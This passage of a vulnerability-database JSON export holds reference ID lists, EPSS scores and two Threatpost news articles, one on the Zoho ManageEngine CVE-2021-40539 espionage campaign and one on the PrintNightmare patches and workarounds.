"RAPID7BLOG:DB7AC7E9278AED114B1BBA8DC96DD124", "RAPID7BLOG:DE426F8A59CA497BB6C0B90C0F1849CD", "RAPID7BLOG:E44F025D612AC4EA5DF9F2B56FF8680C", "RAPID7BLOG:E5721E7C94293776737FD29EE61C94E2", "RAPID7BLOG:F9B4F18ABE4C32CD54C3878DD17A8630"]}, {"type": "securelist", "idList": ["SECURELIST:0C07A61E6D92865F5B58728A60866991", "SECURELIST:830DE5B1B5EBB6AEE4B12EF66AD749F9", "SECURELIST:86368EF0EA7DAA3D2AB20E0597A62656", "SECURELIST:BB0230F9CE86B3F1994060AA0A809C08", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48"]}, {"type": "seebug", "idList": ["SSV:99276", "SSV:99284"]}, {"type": "talosblog", "idList": ["TALOSBLOG:44F665C3D577FC52EF671E9C0CB1750F", "TALOSBLOG:8CDF0A62E30713225D10811E0E977C1D"]}, {"type": "thn", "idList": ["THN:0488E447E08622B0366A0332F848212D", "THN:05251A4D0E47381FEC6EC98D27F46C16", "THN:080602C4CECD29DACCA496697978CAD0", "THN:10A732F6ED612DC7431BDC9A3CEC3A29", "THN:1678C3AE3BCB0278860461A943C3DF30", "THN:2656971C06C4E3D4B0A8C0AC02BBB775", "THN:2DEB4686E139C399EEA9A6B1BCC9EE96", "THN:362401076AC227D49D729838DBDC2052", "THN:42B8A8C00254E7187FE0F1EF2AF6F5D7", "THN:4DE731C9D113C3993C96A773C079023F", "THN:573D61ED9CCFF01AECC281F8913E42F8", "THN:5763EE4C0049A18C83419B000AAB347A", "THN:60B42277F576BB78A640A9D3B976D8D8", "THN:6428957E9DED493169A2E63839F98667", "THN:6510A3250EDBD304F93AA770592A8D14", "THN:777A53E3DACA2E9D76D60AB889CFD10F", "THN:81C9EF28EEDF49E21E8DF15A8FF7EB8D", "THN:83D31EE6B3E59778D812B3B7E67D7CD6", "THN:849B821D3503018DA38FAFFBC34DAEBB", "THN:8636741FCF3A03B6238D8BAF1D9D00EB", "THN:894809E1ADF0684644DCCDD97F76BC73", "THN:9CE630030E0F3E3041E633E498244C8D", "THN:9FD8A70F9C17C3AF089A104965E48C95", "THN:A29E47C7A7467A109B420FF0819814EE", "THN:A52CF43B8B04C0A2F8413E17698F9308", "THN:CAFA6C5C5A34365636215CFD7679FD50", "THN:CF5E93184467C7B8F56A517CE724ABCF", "THN:D0F9B64B55AE6B07B3B0C0540189389E", "THN:D45AECD2A3661A45A08377EAEF0B729F", "THN:D84F06239D4B68B06712C485E00D6D1F", "THN:DB8E18C57AFB9EEEFDABD840FBF5D938", "THN:E7E8D45492BAD83E88C89D34F8502485", "THN:EDD5C9F076596EB9D13D36268BDBFAD1", "THN:F076354512CA34C263F222F3D62FCB1E", "THN:F35E41E26872B23A7F620C6D8F7E2334"]}, {"type": "threatpost", "idList": ["THREATPOST:042D7C606FEB056B462B0BFB61E59917", "THREATPOST:14DD6B793DC77F25538436F7D14C922B", "THREATPOST:1606F3DA3AAD368249E36D32FC2B8079", "THREATPOST:4EEFA1A0FABB9A6E17C3E70F39EB58FE", "THREATPOST:500777B41EEA368E3AC2A6AED65C4A25", "THREATPOST:50745DFE98A2EA07C8BE5D2F2CFA940F", "THREATPOST:529C328386588625C56031DEF4AB5D63", "THREATPOST:52B3DE7108A575C635073D53A3E635EE", "THREATPOST:5E0AFAA7B317D1BA456F06AE1A56D0A3", "THREATPOST:5E56D9C77DAD674F8B21F56E904893D4", "THREATPOST:6F7C157D4D3EB409080D90F02185E728", "THREATPOST:705B9DD7E8602B9F2F913955E25C2550", "THREATPOST:827A7E3B49365A0E49A11A05A5A29192", "THREATPOST:88FF52A5E5D2048EB3D0F046F6D96C9F", "THREATPOST:8D4EA8B0593FD44763915E703BC9AB72", "THREATPOST:927CAECDA58E6BC3266D14FE340589BB", "THREATPOST:933913B1D9B9CF84D33FECFC77C2FDC8", "THREATPOST:98AF08B524D08ABCEB115FECEE99B70F", "THREATPOST:98D815423018872E6E596DAA8131BF3F", "THREATPOST:A8242348917526090B7A1B23735D5C6C", "THREATPOST:ADA9E95C8FD42722E783C74443148525", "THREATPOST:B0D084253CDDA9B0416ADB6DC22BEC9B", "THREATPOST:BC99709891AA93FC7767B53445FC2736", "THREATPOST:C8E47BBF9477DAA48006FB947AF7F4C7", "THREATPOST:CD203B10BCB138850F42815F74C8A5AF", "THREATPOST:EED27183B3F49112A9E785EA56534781"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:1333714193E63A3E616DE66054C5D640", "TRENDMICROBLOG:608F794950B54766A75ABA93823701D0", "TRENDMICROBLOG:C00F7F935E0D1EAD0509B4C376B20A1F"]}, {"type": "vmware", "idList": ["VMSA-2021-0020", "VMSA-2021-0020.1"]}, {"type": "zdt", "idList": ["1337DAY-ID-36558", "1337DAY-ID-36694", "1337DAY-ID-36730", "1337DAY-ID-36874", "1337DAY-ID-37080", "1337DAY-ID-37781"]}]}, "score": {"value": -0.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:70514CEAD92A7A0C6AEE397520B2E557", "AKAMAIBLOG:EC11EFBC73E974C28D27A64B77E1830E"]}, {"type": "atlassian", "idList": ["ATLASSIAN:CONFSERVER-67940"]}, {"type": "attackerkb", "idList": ["AKB:2941EA77-EC87-4EFE-8B5C-AD997AEB5502", "AKB:68C898AA-7786-44EB-AA49-BDCE98588D8C", "AKB:7575B82F-7B7A-4416-B1AA-B8A2DF4D0800", "AKB:77E58EB9-547A-4137-BD9B-C2E5E487FA8E", "AKB:9ADF44D2-FA0D-4643-8B97-8B46983B6917", "AKB:CDA9C43E-015D-4B04-89D3-D6CABC5729B9", "AKB:E7B3F106-3C35-4783-8A6A-BB887C64A40D"]}, {"type": "avleonov", "idList": ["AVLEONOV:14EA12A691C5CFD8469608EAE2674E5B", "AVLEONOV:30285D85FDB40C8D55F6A24D9D446ECF", "AVLEONOV:5945665DFA613F7707360C10CED8C916", "AVLEONOV:9D3D76F4CC74C7ABB8000BC6AFB2A2CE", "AVLEONOV:C33EB29E3A78720B630607BECBB3CEF5", "AVLEONOV:C94D71525D4EE3653DAE00D2FB37BBE1"]}, {"type": "cert", "idList": ["VU:131152", "VU:383432", "VU:506989"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0461", "CPAI-2021-0465", "CPAI-2021-0548"]}, {"type": "cisa", "idList": ["CISA:28BCD901AF6661FE02928495E4D03129", "CISA:2E658D779271DB98A2BD53EE81F29F3B", "CISA:367C27124C09604830E0725F5F3123F7", "CISA:3A09D1755051967FC65BD11A814E9167", "CISA:4F4185688CEB9B9416A98FE75E7AFE02", "CISA:6C836D217FB0329B2D68AD71789D1BB0", "CISA:D9F4EE6727B9BF3A40025E9D70945311"]}, {"type": "cve", "idList": ["CVE-2021-1675", "CVE-2021-22005", "CVE-2021-26084", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35464", "CVE-2021-36934"]}, {"type": "exploitdb", "idList": ["EDB-ID:50131", "EDB-ID:50243"]}, {"type": "githubexploit", "idList": ["AEAB39A1-AAEB-53A6-836E-E4994CBDABF7"]}, {"type": "hackerone", "idList": ["H1:1248040", "H1:1249456"]}, {"type": "hivepro", "idList": ["HIVEPRO:7E3F7EBD4701369D6F9E6149BFE03AC8", "HIVEPRO:8DA601C83DB9C139357327C06B06CB36", "HIVEPRO:CFFBC7E8786DCD48596ACB491F713B13", "HIVEPRO:E7E537280075DE5C0B002F1AF44BE1C5"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:7CB37AC69862942C5D316E69A7815579"]}, {"type": "kaspersky", "idList": ["KLA12198", "KLA12202", "KLA12213", "KLA12214", "KLA12239", "KLA12242"]}, {"type": "kitploit", "idList": ["KITPLOIT:232707789076746523"]}, {"type": "krebs", "idList": ["KREBS:3CC49021549439F95A2EDEB2029CF54E", "KREBS:831FD0B726B800B2995A68BA50BD8BE3"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:17B7F98583E0297FC4ECAB159A115DB9", "MALWAREBYTES:42218FB85F05643E0B2C2C7D259EFEB5", "MALWAREBYTES:8791EE404FCD2E2A063F220E6486B422", "MALWAREBYTES:B6DA5FE033D50131FABF027A2BB04385", "MALWAREBYTES:DA59FECA8327C8353EA012EA1B957C7E", "MALWAREBYTES:DB34937B6474073D9444648D34438225", "MALWAREBYTES:F776F8D86D7BD9350BDC23F1E51B31BF"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2021-34527/"]}, {"type": "mmpc", "idList": ["MMPC:79BA2A7EEC02196D9F15979AFB6BD9D2"]}, {"type": "mscve", "idList": ["MS:CVE-2021-1675", "MS:CVE-2021-34527", "MS:CVE-2021-36934"]}, {"type": "mskb", "idList": ["KB5004945"]}, {"type": "msrc", "idList": ["MSRC:239E65C8BEB88185329D9990C80B10DF", "MSRC:CB3C49E52425E7C1B0CFB151C6D488A4"]}, {"type": "mssecure", "idList": ["MSSECURE:79BA2A7EEC02196D9F15979AFB6BD9D2"]}, {"type": "nessus", "idList": ["CONFLUENCE_CONFSERVER-67940.NASL", "FORGEROCK_OPENAM_7_0.NASL", "MANAGEENGINE_LOG360_CVE-2021-40539.NBIN", "OPENAM_CVE-2021-35464.NBIN", "SMB_NT_MS21_JUL_5004945.NASL", "SMB_NT_MS21_JUL_5004946.NASL", "SMB_NT_MS21_JUL_5004947.NASL", "SMB_NT_MS21_JUL_5004948.NASL", "SMB_NT_MS21_JUL_5004950.NASL", "SMB_NT_MS21_JUL_5004951.NASL", "SMB_NT_MS21_JUL_5004958.NASL", "SMB_NT_MS21_JUL_5004959.NASL", "SMB_NT_MS21_JUL_5004960.NASL", "SMB_NT_MS21_JUL_CVE-2021-34527_REG_CHECK.NASL", "SMB_NT_SERIOUS_SAM_CHECK.NBIN", "VMWARE_VCENTER_67_U3O_VMSA-2021-0020.NASL", "VMWARE_VCENTER_70_U2C_VMSA-2021-0020.NASL", "VMWARE_VCENTER_CVE-2021-22005.NBIN", "WEB_APPLICATION_SCANNING_112812", "WEB_APPLICATION_SCANNING_112944", "WEB_APPLICATION_SCANNING_112961", "WEB_APPLICATION_SCANNING_112962", "WEB_APPLICATION_SCANNING_112963", "WEB_APPLICATION_SCANNING_112964"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163486", "PACKETSTORM:163525", "PACKETSTORM:164013", "PACKETSTORM:164439"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:12BC089A56EB28CFD168EC09B070733D", "QUALYSBLOG:23EF75126B24C22C999DAD4D7A2E9DF5", "QUALYSBLOG:485C0D608A0A8288FF38D618D185D2A2"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:076DBD838FD2726D9F20BCEAFC2D960D", "RAPID7BLOG:21FF66FD08C23AC39BCCB8CFE2238507", "RAPID7BLOG:3538F350FD08E0CFD124821C57A21C64", "RAPID7BLOG:45A121567763FF457DE6E50439C2605A", "RAPID7BLOG:4B35B23167A9D5E016537F6A81E4E9D4", "RAPID7BLOG:5223F0ED8D616DB4EE860CF6B7770388", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "RAPID7BLOG:8495B2B62A16EF7A1217077330A344B3", "RAPID7BLOG:8DADA7B6B3B1BA6ED3D6EDBA37A79204", "RAPID7BLOG:BA6A91F3A0B22C1BFF0C8A73D90FB362", "RAPID7BLOG:BC95AC0129EFB4BE8FD9B532251948ED", "RAPID7BLOG:C1B4AB12CDDD030CDAB31AA2F9E27438", "RAPID7BLOG:E44F025D612AC4EA5DF9F2B56FF8680C"]}, {"type": "securelist", "idList": ["SECURELIST:0C07A61E6D92865F5B58728A60866991"]}, {"type": "seebug", "idList": ["SSV:99276", "SSV:99284"]}, {"type": "talosblog", "idList": ["TALOSBLOG:44F665C3D577FC52EF671E9C0CB1750F", "TALOSBLOG:8CDF0A62E30713225D10811E0E977C1D"]}, {"type": "thn", "idList": ["THN:05251A4D0E47381FEC6EC98D27F46C16", "THN:10A732F6ED612DC7431BDC9A3CEC3A29", "THN:2DEB4686E139C399EEA9A6B1BCC9EE96", "THN:42B8A8C00254E7187FE0F1EF2AF6F5D7", "THN:6428957E9DED493169A2E63839F98667", "THN:6510A3250EDBD304F93AA770592A8D14", "THN:777A53E3DACA2E9D76D60AB889CFD10F", "THN:8636741FCF3A03B6238D8BAF1D9D00EB", "THN:9CE630030E0F3E3041E633E498244C8D", "THN:9FD8A70F9C17C3AF089A104965E48C95", "THN:CAFA6C5C5A34365636215CFD7679FD50", "THN:CF5E93184467C7B8F56A517CE724ABCF", "THN:D45AECD2A3661A45A08377EAEF0B729F", "THN:EDD5C9F076596EB9D13D36268BDBFAD1"]}, {"type": "threatpost", "idList": ["THREATPOST:14DD6B793DC77F25538436F7D14C922B", "THREATPOST:1606F3DA3AAD368249E36D32FC2B8079", "THREATPOST:500777B41EEA368E3AC2A6AED65C4A25", "THREATPOST:50745DFE98A2EA07C8BE5D2F2CFA940F", "THREATPOST:529C328386588625C56031DEF4AB5D63", "THREATPOST:5E56D9C77DAD674F8B21F56E904893D4", "THREATPOST:6F7C157D4D3EB409080D90F02185E728", "THREATPOST:933913B1D9B9CF84D33FECFC77C2FDC8", "THREATPOST:98D815423018872E6E596DAA8131BF3F", "THREATPOST:A8242348917526090B7A1B23735D5C6C", "THREATPOST:B0D084253CDDA9B0416ADB6DC22BEC9B", "THREATPOST:EED27183B3F49112A9E785EA56534781"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:1333714193E63A3E616DE66054C5D640"]}, {"type": "vmware", "idList": ["VMSA-2021-0020.1"]}, {"type": "zdt", "idList": ["1337DAY-ID-36558", "1337DAY-ID-36694", "1337DAY-ID-36730", "1337DAY-ID-36874"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2021-1675", "epss": "0.968880000", "percentile": "0.994750000", "modified": "2023-03-17"}, {"cve": "CVE-2021-22005", "epss": "0.974180000", "percentile": "0.998570000", "modified": "2023-03-17"}, {"cve": "CVE-2021-26084", "epss": "0.974760000", "percentile": "0.999340000", "modified": "2023-03-17"}, {"cve": "CVE-2021-34527", "epss": "0.970380000", "percentile": "0.995570000", "modified": "2023-03-17"}, {"cve": "CVE-2021-35211", "epss": "0.956020000", "percentile": "0.989720000", "modified": "2023-03-17"}, {"cve": "CVE-2021-35464", "epss": "0.974220000", "percentile": "0.998650000", "modified": "2023-03-17"}, {"cve": "CVE-2021-36934", "epss": "0.001050000", "percentile": "0.411730000", "modified": "2023-03-17"}, {"cve": "CVE-2021-40539", "epss": "0.975260000", "percentile": "0.999760000", "modified": "2023-03-17"}], "vulnersScore": -0.3}, "_state": {"dependencies": 1660004461, "score": 1698843382, "epss": 1679134186}, "_internal": {"score_hash": "6cc72f399f42ce7476dd3b3d25c7f842"}}

{"threatpost": [{"lastseen": "2021-11-09T14:12:34", "description": "A new campaign is prying apart a known security vulnerability in the Zoho ManageEngine ADSelfService Plus password manager, researchers warned over the weekend. The threat actors have managed to exploit the Zoho weakness in at least nine global entities across critical sectors so far (technology, defense, healthcare, energy and education), deploying the Godzilla webshell and exfiltrating data.\n\nOn Sunday, Palo Alto Network\u2019s Unit 42 researchers [said](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>) that the targeted cyberespionage campaign is distinct from the ones that the FBI and [CISA warned about](<https://threatpost.com/cisa-fbi-state-backed-apts-exploit-critical-zoho-bug/174768/>) in September.\n\nThe bug is a critical authentication bypass flaw \u2013 CVE-2021-40539 \u2013 that allows unauthenticated remote code execution (RCE). Zoho [patched](<https://threatpost.com/zoho-password-manager-zero-day-attack/169303/>) the vulnerability in September, but it\u2019s been actively exploited in the wild starting at least as early as August when it was a zero-day, opening the corporate doors to attackers who can run amok as they get free rein across users\u2019 Active Directory (AD) and cloud accounts.\n\nConsequences of a successful exploit can be significant: The Zoho ManageEngine ADSelfService Plus is a self-service password management and single sign-on (SSO) platform for AD and cloud apps, meaning that any cyberattacker able to take control of the platform would have multiple pivot points into both mission-critical apps (and their sensitive data) and other parts of the corporate network via AD. It is, in other words, a powerful, highly privileged application that can act as a convenient point-of-entry to areas deep inside an enterprise\u2019s footprint, for both users and attackers alike.\n\nCISA\u2019s alert explained that in the earlier attacks, state-backed, advanced persistent threats (APTs) were deploying a specific webshell and other techniques to maintain persistence in victim environments.\n\nNine days after the CISA alert, Unit 42 researchers saw yet another, unrelated campaign kick off starting on Sept. 17, as a different actor started scanning for unpatched servers. On Sept. 22, after five days of harvesting data on potential targets, exploitation attempts started up and likely continued into early October.\n\nUnit 42 researchers believe that the actor more or less indiscriminately targeted unpatched servers across the spectrum, from education to the Department of Defense, with scans of at least 370 Zoho ManageEngine servers in the U.S. alone.\n\n\u201cWhile we lack insight into the totality of organizations that were exploited during this campaign, we believe that, globally, at least nine entities across the technology, defense, healthcare, energy and education industries were compromised.\u201d they said.\n\n## Godzilla Webshell Does Some Heavy Lifting\n\nUnit 42 said that after threat actors exploited [CVE-2021-40539](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539>) to gain RCE, they quickly moved laterally to deploy several pieces of malware, relying particularly on the publicly available Godzilla webshell.\n\nThe actor uploaded several Godzilla variations to compromised servers and planted some new malware tools as well, including a custom Golang-based open-source backdoor called [NGLite](<https://github.com/Maka8ka/NGLite>) and a new credential-stealer that Unit 42 is tracking as KdcSponge.\n\n\u201cThe threat actors then used either the webshell or the NGLite payload to run commands and move laterally to other systems on the network, while they exfiltrated files of interest simply by downloading them from the web server,\u201d according to the analysis. After the actors pivoted to a domain controller, they installed the new KdcSponge stealer, which is designed to harvest usernames and passwords from domain controllers as accounts attempt to authenticate to the domain via Kerberos.\n\nBoth Godzilla and NGLite are written in Chinese and are free for the taking on GitHub.\n\n\u201cWe believe threat actors deployed these tools in combination as a form of redundancy to maintain access to high-interest networks,\u201d Unit 42 surmised. The researchers described Godzilla as something of a multi-function pocket knife of a webshell, noting that it \u201cparses inbound HTTP POST requests, decrypts the data with a secret key, executes decrypted content to carry out additional functionality and returns the result via a HTTP response.\u201d\n\nAs such, attackers can refrain from inflicting targeted systems with code that\u2019s likely to be flagged as malicious until they\u2019re ready to dynamically execute it, researchers said.\n\n## Using NKN to Communicate Is an Eye-Opener\n\n\u201cNGLite is characterized by its author as an \u2018anonymous cross-platform remote control program based on blockchain technology,'\u201d United 42 researchers Robert Falcone, Jeff White and Peter Renals explained. \u201cIt leverages New Kind of Network ([NKN](<https://nkn.org/>)) infrastructure for its command and control (C2) communications, which theoretically results in anonymity for its users.\u201d\n\nThe researchers noted that using NKN \u2013 a legitimate networking service that uses blockchain technology to support a decentralized network of peers \u2013 for a C2 channel is \u201cvery uncommon.\u201d\n\n\u201cWe have seen only 13 samples communicating with NKN altogether \u2013 nine NGLite samples and four related to a legitimate open-source utility called [Surge](<https://github.com/rule110-io/surge>) that uses NKN for file sharing.\u201d\n\n## Threat Actor Shares TTPs with Emissary Panda\n\nUnit 42 said the identity of the threat actor is unclear, but researchers saw [correlations in tactics and tooling](<https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage>) between the attacker and that of Threat Group 3390, aka [Emissary Panda](<https://threatpost.com/ransomware-major-gaming-companies-apt27/162735/>), APT27, Bronze Union and LuckyMouse), an APT that\u2019s been around since 2013 and which [is believed to operate from China](<https://threatpost.com/bronze-union-apt-updates-remote-access-trojans-in-fresh-wave-of-attacks/142219/>).\n\n\u201cSpecifically, as documented by SecureWorks in an article on a [previous TG-3390 operation](<https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage>), we can see that TG-3390 similarly used web exploitation and another popular Chinese webshell called [ChinaChopper](<https://threatpost.com/deadringer-targeted-exchange-servers-before-discovery/168300/>) for their initial footholds before leveraging legitimate stolen credentials for lateral movement and attacks on a domain controller,\u201d Unit 42 said. \u201cWhile the webshells and exploits differ, once the actors achieved access into the environment, we noted an overlap in some of their exfiltration tooling.\u201d\n\n110921 08:51 UPDATE: [Microsoft said](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>) on Monday that it\u2019s attributing this campaign with high confidence to DEV-0322, a group operating out of China, \u201cbased on observed infrastructure, victimology, tactics, and procedures.\u201d\n\nMicrosoft\u2019s Threat Intelligence Center (MSTIC) has previously detected DEV-0322 taking part in attacks targeting the SolarWinds Serv-U software, which had a zero day \u2013 CVE-2021-35211, a remote memory escape \u2013 that SolarWinds [patched](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>) in July.\n\nMSTIC researchers said that the attacks in this new round of beating up Zoho password manager are installing a custom IIS module. IIS, or Internet Information Services, is an extensible web server software created by Microsoft for use with the Windows NT family.\n\nBesides the custom IIS module, DEV-0322 also deployed a trojan that MSTIC is calling Trojan:Win64/Zebracon that uses hardcoded credentials to make connections to suspected DEV-0322-compromised [Zimbra email servers.](<https://threatpost.com/zimbra-server-bugs-email-plundering/168188/>)\n\nIn its Sept. 16 alert, CISA recommended that organizations that spot indicators of compromise related to ManageEngine ADSelfService Plus should \u201ctake action immediately.\u201d\n\nAlso, CISA strongly recommended domain-wide password resets and double Kerberos Ticket Granting Ticket (TGT) password resets, \u201cif any indication is found that the NTDS.dit file was compromised.\u201d\n\n## Classic Cyberespionage Targets: Healthcare and Energy\n\nIf the actor behind this second Zoho-focused campaign does turn out to be a Chinese APT, it won\u2019t be surprising, some said. Dave Klein, cyber evangelist and director at [Cymulate](<https://cymulate.com/>), pointed to the People\u2019s Republic of China (PRC) having a well-documented, continued interest in healthcare and energy infrastructure data.\n\nHe pointed to the [2015 breach](<https://threatpost.com/5-6-million-fingerprints-stolen-in-opm-hack/114784/>) of the U.S. Office of Personnel Management (OPM) as an example. The massive breach was overwhelmingly [attributed](<https://www.washingtonpost.com/world/national-security/chinese-hackers-breach-federal-governments-personnel-office/2015/06/04/889c0e52-0af7-11e5-95fd-d580f1c5d44e_story.html?hpid=z1>) to the PRC. It included exquisitely sensitive information, including millions of federal employees\u2019 fingerprints, Social Security numbers, dates of birth, employee performance records, employment history, employment benefits, resumes, school transcripts, military service documentation and psychological data from interviews conducted by background investigators.\n\n\u201cThe PRC got into clearance background information data including very sensitive information. Subsequently in that case they were looking for weaknesses in US classified personnel \u2013 which would include health hardships \u2013 either personally or related to them,\u201d Klein told Threapost via email on Monday.\n\nHe noted that following the OPM breach, some healthcare agencies were subsequently breached, including [Anthem Health](<https://threatpost.com/chinese-hackers-anthem-data-breach-indicted/144572/>): an attack that affected more than 78 million people. \u201cThe interest in healthcare data globally continues not only for espionage purposes against targets \u2013 building an inventory of hardships/weak points as well as seeking out healthcare data to better serve their local industries,\u201d Klein noted. \u201cOn energy, the interest is both on stealing industrial espionage information as well as to set up compromises in critical infrastructures for potential use in cases of future hostilities.\u201d\n\n## If Patching Isn\u2019t Mandatory, a Breach Is a Given\n\nMike Denapoli, lead security architect at Cymulate, added that well-documented (and patched) vulnerabilities in massively popular platforms like Microsoft Exchange and MangeEngine are ripe fruit for threat actors to pluck. Organizations that can\u2019t or won\u2019t patch are sitting ducks, he said.\n\n\u201cFor whatever the reasons may be (downtime avoidance, fear over patches disrupting workflows, etc.), attackers know these systems are vulnerable, and are making sure to take advantage of any organization that doesn\u2019t keep patching updated,\u201d Denapoli told Threatpost. \u201cWe have reached the point where patching is a must \u2013 within a reasonable amount of time \u2013 and needs to be performed. While you don\u2019t have to patch immediately, you must patch regularly. Downtime is mandatory. Testing is mandatory. If not, then a breach is mandatory.\u201d\n\n_Image courtesy of [AlphaCoders](<https://wall.alphacoders.com/big.php?i=1012166>)._\n\n110821 12:24 UPDATE: Added input from Mike Denapoli and Dave Klein.\n\n**_Cybersecurity for multi-cloud environments is notoriously challenging. OSquery and CloudQuery is a solid answer. Join Uptycs and Threatpost on Tues., Nov. 16 at 2 p.m. ET for \u201c_**[**_An Intro to OSquery and CloudQuery_**](<https://bit.ly/3wf2vTP>)**_,\u201d a LIVE, interactive conversation with Eric Kaiser, Uptycs\u2019 senior security engineer, about how this open-source tool can help tame security across your organization\u2019s entire campus._**\n\n[**_Register NOW_**](<https://bit.ly/3wf2vTP>)**_ for the LIVE event and submit questions ahead of time to Threatpost\u2019s Becky Bracken at _**[**_becky.bracken@threatpost.com_**](<mailto:becky.bracken@threatpost.com>)**_._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-08T16:38:05", "type": "threatpost", "title": "Zoho Password Manager Flaw Torched by Godzilla Webshell, New Data Stealer", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211", "CVE-2021-40539"], "modified": "2021-11-08T16:38:05", "id": "THREATPOST:BC99709891AA93FC7767B53445FC2736", "href": "https://threatpost.com/zoho-password-manager-flaw-godzilla-webshell/176063/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-08T07:53:10", "description": "Microsoft has released an emergency patch for the PrintNightmare, a set of two critical remote code-execution (RCE) vulnerabilities in the Windows Print Spooler service that hackers can use to take over an infected system. However, more fixes are necessary before all Windows systems affected by the bug are completely protected, according to the federal government.\n\nMicrosoft on Tuesday released an [out-of-band update](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) for several versions of Windows to address [CVE-2021-34527](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34527>), the second of two bugs that were initially thought to be one flaw and which have been dubbed PrintNightmare by security researchers.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nHowever, the latest fix only appears to address the RCE variants of PrintNightmare, and not the local privilege escalation (LPE) variant, according to an [advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/07/06/microsoft-releases-out-band-security-updates-printnightmare>) by the Cybersecurity Infrastructure and Security Administration (CISA), citing a [VulNote](<https://www.kb.cert.org/vuls/id/383432>) published by the CERT Coordination Center (CERT/CC).\n\nMoreover, the updates do not include Windows 10 version 1607, Windows Server 2012 or Windows Server 2016, which will be patched at a later date, according to CERT/CC.\n\n## **A Tale of Two Vulnerabilities**\n\nThe PrintNightmare saga [began last Tuesday](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) when a proof-of-concept (PoC) exploit for the vulnerability \u2014 at that time tracked as CVE-2021-1675 \u2014 was dropped on GitHub showing how an attacker can exploit the vulnerability to take control of an affected system. While it was taken back down within a few hours, the code was copied and remains in circulation on the platform.\n\nThe response to the situation soon turned into confusion. Though Microsoft released an [patch for CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>) in it its usual raft of [monthly Patch Tuesday updates](<https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/>), addressing what it thought was a minor EoP vulnerability, the listing was updated later in the week after researchers from Tencent and NSFOCUS TIANJI Lab figured out it could be used for RCE.\n\nHowever, it soon became clear to many experts that Microsoft\u2019s initial patch didn\u2019t fix the entire problem. CERT/CC on Thursday offered its own workaround for PrintNightmare, advising system administrators to disable the Windows Print Spooler service in Domain Controllers and systems that do not print.\n\nTo further complicate matters, Microsoft also last Thursday dropped [a notice](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) for a bug called \u201cWindows Print Spooler Remote Code Execution Vulnerability\u201d that appeared to be the same vulnerability, but with a different CVE number\u2014in this case, CVE-2021-34527.\n\n\u201cThis vulnerability is similar but distinct from the vulnerability that is assigned CVE-2021-1675, which addresses a different vulnerability in RpcAddPrinterDriverEx(),\u201d the company wrote in the advisory at the time. \u201cThe attack vector is different as well. CVE-2021-1675 was addressed by the June 2021 security update.\u201d\n\n## **Microsoft Issues Incomplete Patch**\n\nThe fix released this week addresses CVE-2021-34527, and includes protections for CVE-2021-1675, according to the CISA, which is encouraging users and administrators to review the [Microsoft Security Updates](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) as well as [CERT/CC Vulnerability Note VU #383432](<https://www.kb.cert.org/vuls/id/383432>) and apply the necessary updates or workarounds.\n\nBut as noted, it won\u2019t fix all systems.\n\nSo, in cases where a system is not protected by the patch, Microsoft is offering several workarounds for PrintNightmare. One is very similar to the federal government\u2019s solution from last week: To stop and disable the Print Spooler service \u2014 and thus the ability to print both locally and remotely \u2014 by using the following PowerShell commands: Stop-Service -Name Spooler -Force and Set-Service -Name Spooler -StartupType Disabled.\n\nThe second workaround is to disable inbound remote printing through Group Policy by disabling the \u201cAllow Print Spooler to accept client connections\u201d policy to block remote attacks, and then restarting the system. In this case, the system will no longer function as a print server, but local printing to a directly attached device will still be possible.\n\nAnother potential option to prevent remote exploitation of the bug that has worked in \u201climited testing\u201d is to block both the RPC Endpoint Mapper (135/tcp) 